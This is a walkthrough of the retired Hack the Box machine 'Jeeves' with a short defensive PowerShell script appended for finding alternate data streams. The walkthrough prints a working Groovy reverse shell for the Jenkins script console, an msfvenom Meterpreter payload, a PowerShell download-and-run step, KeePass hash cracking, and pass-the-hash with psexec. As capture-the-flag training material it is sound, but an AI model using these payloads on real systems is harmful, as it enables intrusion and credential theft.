
Hack the Box – Jeeves Walkthrough

Today we’re going to solve another CTF machine, “Jeeves”. It is now a retired box and is accessible to VIP members.


  • Target OS: Windows
  • IP Address:
  • Difficulty: Medium


  • Getting user
  • Getting root


As always, the first step is the reconnaissance phase, starting with port scanning.

Port Scanning

In this step we identify which services are listening behind the IP address.

nmap -p 1-65535 -T4 -A -v

Enumerating Port 80

Nmap reveals Microsoft IIS httpd 10.0 running on port 80, serving an “Ask Jeeves” search page.

Checking the page source reveals an error.html page that contains nothing but a jeeves.PNG image.

This image reveals some information that might help with exploitation or privilege escalation on the box.

Enumerating Port 50000

Nmap reveals a Jetty service running on port 50000, and if we browse the page

Let’s run DirBuster to see if there’s anything hidden.

We found /askjeeves, so let’s take a look at it.


A quick search for Jenkins exploits shows that the Jenkins-CI Groovy script console can be used to execute OS commands through Java.

Reverse Shell:

Manage Jenkins > Script Console


// Groovy runs in the Jenkins JVM; java.io and java.net are imported by default.
String host="";
int port=1337;
String cmd="cmd.exe";
// Spawn cmd.exe with stderr merged into stdout, then connect back to the listener.
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// Pump bytes between the process and the socket until either side closes.
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();
    Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();

Click Run and start the listener.

Since we now have a low-privilege shell, let’s upgrade it to a Meterpreter session.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shell.exe

Use PowerShell to transfer the generated shell.exe to the target machine.

powershell "(new-object System.Net.WebClient).Downloadfile('', 'shell.exe')"

After running the PowerShell command and executing shell.exe, we get a Meterpreter session.

We can find user.txt under C:\Users\kohsuke\Desktop.

Privilege Escalation

Method 1

We start by gathering basic information about the target system, so let’s run systeminfo first.

Copy all of this output into a local file named systeminfo.txt. Now we run Windows Exploit Suggester.

python --update
python --database 2019-08-01-mssb.xls --systeminfo systeminfo.txt

The machine is vulnerable to MS16-075 (RottenPotato).

Abusing Token Privileges For Windows Local Privilege Escalation

Currently there are no impersonation tokens available, so let’s run RottenPotato.exe again.

There you go!

impersonate_token "NT AUTHORITY\\SYSTEM"


Method 2

There’s a file CEH.kdbx under C:\Users\kohsuke\Documents.

After downloading the file, we first check its file type.

This reveals a KeePass password database.

Open the KeePass file.

keepassx CEH.kdbx

This file is protected with a password, but we know how to get it 🙂

There’s a pre-installed program in Kali named keepass2john.

keepass2john CEH.kdbx > key


Let’s crack the hash.

Cracking the Hash Using John

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt key

Password: moonshine1

Let’s open our KeePass file.

There’s a bunch of entries to note; checking each of them, we found a “Backup stuff” entry revealing critical information.


Here’s the remaining content of the KeePass file.


But we found something interesting inside Backup Stuff.

NTLM Hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Since the SMB service is running on the target machine, we can attempt to authenticate to the system using a password spray attack or a pass-the-hash attack.

crackmapexec smb -u Administrator -p passwords.txt --lusers
crackmapexec smb -u Administrator -H hash.txt --lusers

Metasploit PSEXEC Module

Module: exploit/windows/smb/psexec

Now let’s run it!

And we’re NT AUTHORITY\SYSTEM.

Now let’s look for the flag.

dir /a shows all hidden files on the system, and dir /R shows alternate data streams.

The entry hm.txt:root.txt:$DATA means that root.txt is stored in an alternate data stream of hm.txt.

To read root.txt: more < hm.txt:root.txt:$DATA
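As an added example (not part of the original walkthrough), the following PowerShell function generalizes the dir /R check into a recursive sweep that lists every non-default alternate data stream under a directory and previews its contents, which is how a defender would look for data hidden the way root.txt was here. The function name and the path C:\Users\Administrator\Desktop are assumptions.

```powershell
# Added example: enumerate alternate data streams (ADS) under a directory tree.
# Assumes PowerShell 3.0+ on an NTFS volume; the path below is a placeholder.

function Find-AlternateDataStream {
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$MaxBytes = 256   # limit the preview so large streams stay readable
    )
    Get-ChildItem -Path $Path -Recurse -Force -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # Get-Item -Stream * returns every stream on the file; ':$DATA' is the
            # ordinary file content, so anything else is an alternate stream.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    $preview = Get-Content -LiteralPath $file.FullName -Stream $_.Stream `
                        -Raw -ErrorAction SilentlyContinue
                    if ($preview -and $preview.Length -gt $MaxBytes) {
                        $preview = $preview.Substring(0, $MaxBytes) + '...'
                    }
                    [pscustomobject]@{
                        File    = $file.FullName
                        Stream  = $_.Stream     # e.g. root.txt for hm.txt:root.txt:$DATA
                        Length  = $_.Length
                        Preview = $preview
                    }
                }
        }
}

# Zone.Identifier streams are written by browsers (Mark of the Web) and are
# expected on downloaded files; filter them out so unusual streams stand out.
Find-AlternateDataStream -Path 'C:\Users\Administrator\Desktop' |
    Where-Object { $_.Stream -ne 'Zone.Identifier' } |
    Format-Table -AutoSize
```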

Noor Qureshi
